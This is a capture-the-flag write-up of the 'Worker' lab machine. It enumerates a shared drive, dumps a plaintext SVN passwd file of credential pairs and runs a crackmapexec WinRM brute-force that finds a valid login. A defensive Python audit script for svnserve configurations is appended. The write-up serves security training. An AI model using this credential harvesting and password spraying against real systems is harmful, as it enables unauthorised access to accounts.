W: Drive


PEAS has listed an unusual drive within the target system: W:

PS C:\> net share
 
Share name   Resource                        Remark
 
-------------------------------------------------------------------------------
c$           c:\                             Default share                     
IPC$                                         Remote IPC                        
w$           w:\                             Default share                     
admin$       c:\Windows                      Remote Admin                      
The command completed successfully.

The W: drive is also shared over SMB.

PS C:\> cd W:\ ; ls
 
 
    Directory: W:\
 
 
Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       2020-06-16     18:59                agents                                                                
d-----       2020-03-28     14:57                AzureDevOpsData                                                       
d-----       2020-04-03     11:31                sites                                                                 
d-----       2020-06-20     16:04                svnrepos

Navigating to the W: drive, I discovered a directory structure indicative of Azure DevOps components. Key directories include agents, AzureDevOpsData, sites, and svnrepos.

The W:\agents directory likely contains data related to build agents, and the W:\AzureDevOpsData directory may store data associated with Azure DevOps services. However, since the foothold has already been established through the exploitation of the instance, enumerating these directories may not be immediately relevant for the current objective.

sites


PS W:\> ls sites
 
 
    Directory: W:\sites
 
 
Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       2023-11-23     18:46                alpha.worker.htb                                                      
d-----       2020-07-20     23:43                cartoon.worker.htb                                                    
d-----       2020-04-03     12:27                dimension.worker.htb                                                  
d-----       2020-07-20     23:43                lens.worker.htb                                                       
d-----       2020-07-20     23:43                solid-state.worker.htb                                                
d-----       2020-08-03     12:33                spectral.worker.htb                                                   
d-----       2020-07-20     23:43                story.worker.htb                                                      
d-----       2020-07-20     23:43                twenty.worker.htb                                                     

The structure under the W:\sites directory reveals individual directories for different worker instances, one for each of the virtual hosts / sub-domains found earlier. Each web application is hosted in the directory of its respective virtual host / sub-domain.

svnrepos


PS W:\> tree /F /A W:\svnrepos
Folder PATH listing for volume Work
Volume serial number is 0000414b e82a:AEA8
W:\SVNREPOS
\---www
    |   format
    |   README.txt
    |   
    +---conf
    |       authz
    |       hooks-env.tmpl
    |       passwd
    |       svnserve.conf
    |       
    +---db
    |   |   current
    |   |   format
    |   |   fs-type
    |   |   fsfs.conf
    |   |   min-unpacked-rev
    |   |   rep-cache.db
    |   |   rep-cache.db-journal
    |   |   txn-current
    |   |   txn-current-lock
    |   |   uuid
    |   |   write-lock
    |   |   
    |   +---revprops
    |   |   \---0
    |   |           0
    |   |           1
    |   |           2
    |   |           3
    |   |           4
    |   |           5
    |   |           
    |   +---revs
    |   |   \---0
    |   |           0
    |   |           1
    |   |           2
    |   |           3
    |   |           4
    |   |           5
    |   |           
    |   +---transactions
    |   \---txn-protorevs
    +---hooks
    |       post-commit.tmpl
    |       post-lock.tmpl
    |       post-revprop-change.tmpl
    |       post-unlock.tmpl
    |       pre-commit.tmpl
    |       pre-lock.tmpl
    |       pre-revprop-change.tmpl
    |       pre-unlock.tmpl
    |       start-commit.tmpl
    |       
    \---locks
            db-logs.lock
            db.lock

The svnrepos directory indicates the integration of Apache Subversion. It’s rather evident at this point that the target Azure DevOps instance is configured to manage Subversion version control alongside its default capabilities. This can be an additional feature or customization beyond the default installation, emphasizing the flexibility of Azure DevOps to support various version control systems.

I will check the sub-directory, W:\svnrepos\www\conf, as it contains what appears to be the most relevant data for the current scope of operation.

W:\svnrepos\www\conf


PS W:\> cd W:\svnrepos\www\conf ; ls
 
 
    Directory: W:\svnrepos\www\conf
 
 
Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       2020-06-20     11:29           1112 authz                                                                 
-a----       2020-06-20     11:29            904 hooks-env.tmpl                                                        
-a----       2020-06-20     15:27           1031 passwd                                                                
-a----       2020-04-04     20:51           4454 svnserve.conf

authz


PS W:\svnrepos\www\conf> cat authz | Where { $_ -notmatch '^#' }
 
[aliases]
 
[groups]

The file seems empty.

hooks-env.tmpl


PS W:\svnrepos\www\conf> cat hooks-env.tmpl | Where { $_ -notmatch '^#' }
 
[default]
LANG = en_US.UTF-8
 
[pre-commit]
PATH = /usr/local/bin:/usr/bin:/usr/sbin

The hooks-env.tmpl file is an irrelevant template file.

passwd


PS W:\svnrepos\www\conf> cat passwd | Where { $_ -notmatch '^#' }
 
[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday

The passwd file contains what appears to be a list of credential pairs, delimited by the = character. While a valid system user, robisl, can be seen in the list, I will save the whole content into files to prepare for a brute-force attack against the target WinRM server, to hopefully validate the credential of the robisl user and additionally find other potentially valid system credentials.

Brute-force Attack


┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ crackmapexec winrm $IP -u users.txt -p passwords.txt --continue-on-success
SMB         10.10.10.203    5985   NONE             [*] None (name:10.10.10.203) (domain:None)
HTTP        10.10.10.203    5985   NONE             [*] http://10.10.10.203:5985/wsman
 
[...REDACTED...]
 
WINRM       10.10.10.203    5985   NONE             [+] None\robisl:wolves11 (Pwn3d!)
 
[...REDACTED...]

crackmapexec returned a single valid system credential: robisl.

Remote Management Users


PS W:\svnrepos\www\conf> cmd /c NET localgroup "Remote Management Users" | Select-String robisl
 
robisl
 

The robisl user is part of the Remote Management Users group. Moving on to the Lateral Movement phase.

svnserve.conf


PS W:\svnrepos\www\conf> cat svnserve.conf | Where { $_ -notmatch '^#' }
 
 
[general]
password-db = passwd
 
[sasl]

While the svnserve.conf file contains a password, it appears to be default.
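
From the defender's side, the conditions seen in the passwd and svnserve.conf sections above can be checked with a small audit; this is an added example, not part of the original write-up. The function names, the sample file contents and the account names are constructed for illustration, and the OS account list is assumed to be supplied by the caller.

```python
# Added example: audit an svnserve conf directory for the weaknesses seen above.
# All sample data is constructed; parse_ini() and audit() are hypothetical names.

def parse_ini(text):
    """Return {section: [(key, value), ...]}, keeping duplicate keys."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            sections.setdefault(current, [])
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current].append((key.strip(), value.strip()))
    return sections

def audit(svnserve_conf, passwd, os_accounts):
    """Return a list of finding strings for one repository's conf files."""
    findings = []
    conf = parse_ini(svnserve_conf)
    general = dict(conf.get("general", []))
    sasl = dict(conf.get("sasl", []))
    users = parse_ini(passwd).get("users", [])
    # Without SASL, svnserve reads plaintext passwords from password-db.
    if "password-db" in general and sasl.get("use-sasl", "false").lower() != "true":
        findings.append(f"plaintext password-db in use: {len(users)} entries readable")
    if "authz-db" not in general:
        findings.append("no authz-db: no path-based access control")
    names = [name for name, _ in users]
    for name in sorted({n for n in names if names.count(n) > 1}):
        findings.append(f"duplicate user entry: {name}")
    # Windows account names are case-insensitive, so compare lowercased.
    os_lower = {a.lower() for a in os_accounts}
    for name in sorted(set(names)):
        if name.lower() in os_lower:
            findings.append(f"SVN user name matches an OS account: {name}")
    return findings

# Constructed sample input mirroring the layout of the files on this page.
SVNSERVE_CONF = "[general]\npassword-db = passwd\n\n[sasl]\n"
PASSWD = "[users]\nalice = Example-Pass-1\nbob = Example-Pass-2\nbob = Example-Pass-3\n"
OS_ACCOUNTS = ["Administrator", "alice"]

if __name__ == "__main__":
    for finding in audit(SVNSERVE_CONF, PASSWD, OS_ACCOUNTS):
        print("[!]", finding)
```

Any SVN user name that matches an OS account is a candidate for password rotation on both sides, since the plaintext file is readable by anyone with access to the share.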